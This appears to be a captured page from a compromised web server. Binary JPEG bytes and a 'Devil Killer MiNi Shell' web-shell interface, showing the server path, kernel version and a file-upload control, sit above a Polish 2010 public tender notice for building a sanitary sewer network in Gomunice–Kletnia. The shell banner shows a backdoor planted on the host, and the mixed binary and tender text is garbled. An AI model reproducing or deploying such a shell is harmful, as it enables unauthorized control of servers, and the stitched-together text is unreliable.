JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100531/150046-N-2010.html

<p class="kh_header"><b>Gomunice: Budowa sieci kanalizacji sanitarnej w miejscowości Gomunice - Kletnia  Etap II</b><br>
<b>Numer ogłoszenia: 150046 - 2010; data zamieszczenia: 31.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gomunice , ul. Armii Krajowej 30, 97-545 Gomunice, woj. łódzkie, tel. 044 6850245, faks 044 6842468.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacji sanitarnej w miejscowości Gomunice - Kletnia  Etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest realizacja zadania pn.: Budowa sieci kanalizacji  
  sanitarnej w miejscowości Gomunice i Kletnia - etap II . 
2. Zakres rzeczowy przedmiotu zamówienia obejmuje:

 sieć kanalizacji sanitarnej  w ul. Armii Krajowej - Wolności  - O 200 PCV - 69,50 m, 
 sieć kanalizacji sanitarnej w ul. Partyzantów O 200 PCV - 155,00 m,  O 200 PE - 
   168,00 m wraz z przewiertem sterowanym, 
 sieć kanalizacji sanitarnej w ul. Wolności O 200 PCV - 263,50 m,
 sieć kanalizacji sanitarnej w ul. Wesoła O 250 PCV - 327,00 m, 
 sieć kanalizacji sanitarnej w ul. Prusa O 200 PCV - 118,00 m, 
 sieć kanalizacji sanitarnej w ul. Wyzwolenia O 200 PCV - 172,50  m.

Uproszczony opis :
Projektowaną sieć kanalizacji sanitarnej wykonać na podstawie dokumentacji projektowej pn:  Sieć kanalizacji sanitarnej wraz z przyłączami oraz przepompownią ścieków w miejscowości Gomunice i Kletnia . Rurociągi z PVC ( T ) klasy SN8 , łączone na połączenia kielichowe. Rurociągi z PE 100 SDR11, łączone przez zgrzewanie.
Rurociągi do sterowanych przewiertów horyzontalnych z rur PE wzmocnionych, przystosowanych do tego typu przewiertów.
Studzienki rewizyjne z kręgów żelbetowych, łączonych na uszczelki gumowe, przykrytych płytą nadstudzienną d 1200 z pierścieniem odciążającym i włazem żeliwnym typ ciężki kl.
40 T - całość z atestowanych elementów prefabrykowanych.
Studzienki z PVC d 425 w miejscach gdzie występuje kolizja z istniejącym uzbrojeniem podziemnym, lub też zagospodarowanie terenu uniemożliwia zastosowanie studni żelbetowych.
Rurociągi układać na 15 cm podsypce piaskowej a następnie ułożyć 30 cm obsypke.
Dla rurociągów prowadzonych w jezdniach przewidziano zasypkę wykopu piaskiem. Warunki gruntowo-wodne zgodnie z opracowaną dokumentacją geotechniczną.

     przyłącza kanalizacji sanitarnej O 160 PCV - 526,66 m, sztuk 62.

Uproszczony opis :
Projektowane przyłącza wraz z siecią kanalizacji sanitarnej wykonać na podstawie dokumentacji projektowej pn :  Sieć kanalizacji sanitarnej wraz z przyłączami oraz przepompownią ścieków w miejscowości Gomunice i Kletnia . Rurociągi z PVC ( T ) klasy SN8 , łączone na połączenia kielichowe. Studzienki rewizyjne z kręgów żelbetowych, łączonych na uszczelki gumowe, przykrytych płytą nadstudzienną d 1200 z pierścieniem odciążającym i włazem żeliwnym typ ciężki kl. 40 T - całość z atestowanych elementów prefabrykowanych. Studzienki z PVC d 425 w miejscach gdzie występuje kolizja z istniejącym uzbrojeniem podziemnym, lub też zagospodarowanie terenu uniemożliwia 
zastosowanie studni żelbetowych.
Rurociągi układać na 15 cm podsypce piaskowej a następnie ułożyć 30 cm obsypkę. Dla rurociągów prowadzonych w jezdniach przewidziano zasypkę wykopu piaskiem. Warunki gruntowo-wodne zgodnie z opracowaną dokumentacją geotechniczną.

3. Szczegółowy opis przedmiotu zamówienia zawiera:
a) projekt budowano-wykonawczy,
b) przedmiary robót,
c) specyfikacja techniczna wykonania i odbioru robót budowlanych. 
4. Zamawiający nie dopuszcza możliwości składania ofert częściowych.
5. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.  
6. Zamawiający dopuszcza możliwości powierzenia przez Wykonawcę wykonania części 
    zamówienia podwykonawcom.
7. Kody klasyfikacji Wspólnego Słownika Zamówień  CPV: 45232410-9, 45232440-8..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9, 45.23.24.40-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1  Wysokość wadium

1. Oferent, który przystąpi do niniejszego postępowania, zobowiązany jest do wniesienia 
    wadium w wysokość: 25.000,00  zł ( słownie: dwadzieścia pięć tysięcy złotych ).
2. Wadium wnosi się  przed upływem terminu składania ofert.     

8.2  Forma wadium

1. Wadium może być wnoszone w jednej lub kilku następujących formach:
 a. pieniądzu; 
 b. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
     kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
 c. gwarancjach bankowych;
 d. gwarancjach ubezpieczeniowych;
 e. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 
    dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. 
    U. Nr 109, poz. 1158, z późniejszymi zmianami ). 

8.3  Miejsce i sposób wniesienia wadium

1. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy     
    Zamawiającego:
    Bank Spółdzielczy O/Gomunice
    Nr rachunku: 91898000092003001755640004 z adnotacją: 
  Wadium na budowę sieci kanalizacji sanitarnej w miejscowości Gomunice i Kletnia - 
    II etap 
     
2. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli przed upływem terminu 
    składania ofert znajdzie się na rachunku bankowym Zamawiającego.
3. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
4. Wadium wniesione w pieniądzu lub w formie innej niż pieniądz należy złożyć w formie 
    oryginału, razem z ofertą.
5. Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium musi zawierać 
    w swojej treści stwierdzenie, że gwarant zobowiązuje się bezwarunkowo pokryć wszelkie 
    zobowiązania Wykonawcy wobec Zamawiającego wynikające z zapisów zawartych w 
    art. 46 ustawy Prawo zamówień publicznych do wysokości gwarantowanej kwoty, na   
    pierwsze żądanie Zamawiającego przedstawione gwarantowi w formie pisemnej w okresie 
    obowiązywania gwarancji, w dniu następnym po otrzymaniu żądania wezwania od 
    Zamawiającego.    
6. Wniesione wadium w formie, o której mowa w pkt 8.2 pkt 1 musi wyraźnie wskazywać na 
    wszystkich przedsiębiorców składających ofertę wspólną.
7. Gwarancja/poręczenie musi być wykonalne na terytorium Rzeczpospolitej Polskiej.
8. Wszelkie spory dotyczące gwarancji/poręczenia podlegają rozstrzygnięciu zgodnie z 
    prawem Rzeczpospolitej Polskiej i podlegają kompetencji sądu właściwego dla siedziby 
    Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga aby wykonawcy:-złożyli dokumenty potwierdzające posiadanie uprawnień do wykonywania działalności związanej z przedmiotem niniejszego zamówienia publicznego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga aby wykonawcy:
  -  wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert o 
      udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym 
      okresie, co  najmniej 4 zadania w zakresie sieci wod.- kan. o wartości nie mniejszej niż 
      1,0 mln zł każde z podaniem ich wartości, daty i miejsca wykonania oraz  załączeniem 
      dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki 
      budowlanej i prawidłowo ukończone ( np. referencje, protokoły odbioru ). 
  -  wykonali w generalnym wykonawstwie co najmniej 1 przewiert sterowany rurą PE.
      Przez zadanie Zamawiający rozumie jednorazowe zamówienie udzielone i zrealizowane  
      na podstawie jednej umowy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w zakresie dysponowania odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga aby wykonawcy:
  -  dysponowali osobami zdolnymi do realizacji zamówienia posiadającymi uprawnienia 
   do sprawowania funkcji: kierownika robót, kierowników w branżach:  
   a) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, 
       wodociągowych i kanalizacyjnych; 
   b) konstrukcyjno - budowlanej w zakresie dróg; 
       Wykonawca przedstawi w ofercie kandydatów na każde stanowisko wymienione 
       powyżej. Do wykazu należy załączyć dokumenty stwierdzające, że osoby, które będą 
       wykonywać zamówienie w funkcji kierownika robót, kierowników poszczególnych branż 
       są uprawnione bez ograniczeń w swoich specjalnościach do kierowania robotami wraz z 
       aktualnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów 
       Budownictwa wraz z oświadczeniami wskazanych osób o gotowości uczestnictwa w 
       realizacji zamówienia oraz informacją o podstawie do dysponowania tymi osobami wg 
       samodzielnie napisanego załącznika.
   Zamawiający wymaga, aby osoby pełniące funkcję kierownika budowy, posiadały co 
   najmniej 10-letnie doświadczenie zawodowe przy realizacji inwestycji w tym, co najmniej 
   5-letnie doświadczenie zawodowe na stanowiskach kierowniczych podobnych  robót,  
   a kierownicy poszczególnych branż co najmniej 5 letnie doświadczenie zawodowe w tym, 
   co najmniej 3-letnie doświadczenie zawodowe na stanowiskach  kierowniczych.
   Dodatkowo, w odniesieniu do osoby pełniącej funkcję kierownika budowy, wykonawcy 
   zobowiązani są do przedłożenia informacji dotyczącej jego 5-letniego doświadczenia 
   zawodowego w pracy na stanowisku kierownika robót w zakresie budowy kanalizacji 
   sanitarnej. Informacja ta winna zawierać:
a) przedmiot zamówienia ( wykaz prowadzonych robót ),
b) podmiot dla którego realizowane było zamówienie,
c) daty od ( miesiąc/rok ) do ( miesiąc/rok ) pełnienia funkcji kierownika robót budowlanych.
    Wymagane informacje winny jasno wskazywać doświadczenie kandydata w pełnieniu 
     funkcji kierownika budowy.
 -  dysponowali średnim rocznym zatrudnieniem w liczbie co najmniej 50 pracowników i 
     liczebności personelu kierowniczego w ilości co najmniej 3 osób.
     Zamawiający nie wyznacza szczegółowego warunku w zakresie dysponowania 
     odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie wykonawca musi spełniać następujące warunki:
a) osiągnął w każdym z ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia 
    działalności jest krótszy - w tym okresie, przychody netto ze sprzedaży na poziomie nie 
    niższym niż wartość wycenionego przedmiotu zamówienia ( wartość podana w formularzu 
    ofertowym ).
    W celu potwierdzenia i weryfikacji przez Zamawiającego spełnienia powyższego  
    warunku wykonawcy zobowiązani są przedłożyć sprawozdanie finansowe albo jego 
    część, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o 
    rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, 
    a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania 
     finansowego innych dokumentów określających obroty oraz zobowiązania i należności - 
     za ostatnie trzy lata obrotowe ( 2007-2009 ), a jeżeli okres prowadzenia działalności jest 
     krótszy - za ten okres,   
 b) posiada własne środki finansowe lub zdolność kredytową umożliwiającą realizację 
     zamówienia w wysokości nie mniejszej niż 1,0 mln zł. 
     Na potwierdzenie spełnienia powyższego warunku wykonawca jest zobowiązany  
     załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo -       
     kredytowej, w którym/których posiada rachunek bankowy, potwierdzający w sposób 
     jednoznaczny wysokość posiadanych środków finansowych lub zdolność kredytową  
     jeszcze nie zaangażowaną dla innych działań wykonawcy.
 c) posiada opłaconą polisę, a przypadku jej braku inny dokument potwierdzający, że 
     wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
     działalności związanej z przedmiotem zamówienia na kwotę minimum 1,0 mln zł. 
     Jeżeli polisa lub inny dokument potwierdzający, że wykonawca jest ubezpieczony 
     obejmuje okres krótszy niż termin realizacji zamówienia, wykonawca składa 
     oświadczenie, że w przypadku wyboru jego oferty zobowiązuje się do przedłużenia polisy  
     na cały okres objęty zamówieniem oraz zobowiązuje się do przedkładania kolejnej polisy  
     Zamawiającemu w wypadku zakończenia okresu ubezpieczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie, że oferowane roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz robót, które wykonawca zamierza zlecić podwykonawcom. Oświadczenie wykonawcy do wniesienia zabezpieczenia i formy należytego wykonania umowy w przypadku uzyskania zamówienia w wysokości 5% ceny całkowitej podanej w ofercie. Zobowiązanie Wykonawcy w przypadku uzyskania zamówienia do ubezpieczenia budowy i robót na czas trwania kontraktu, na kwotę brutto zaoferowaną w przetargu z tytułu szkód, które mogą zaistnieć w związku z  określonymi zdarzeniami losowymi oraz odpowiedzialności cywilnej. Oświadczenie o dokonaniu wizji terenu przeznaczonego pod realizację zadania. Proponowany harmonogram rzeczowo - terminowo - finansowy w układzie miesięcznych przepływów finansowych dla całego trwania kontraktu. Oświadczenie o zrealizowaniu zamówienia zgodnie z harmonogramem rzeczowo - terminowo - finansowym.Zaparafowany przez wykonawce projekt umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
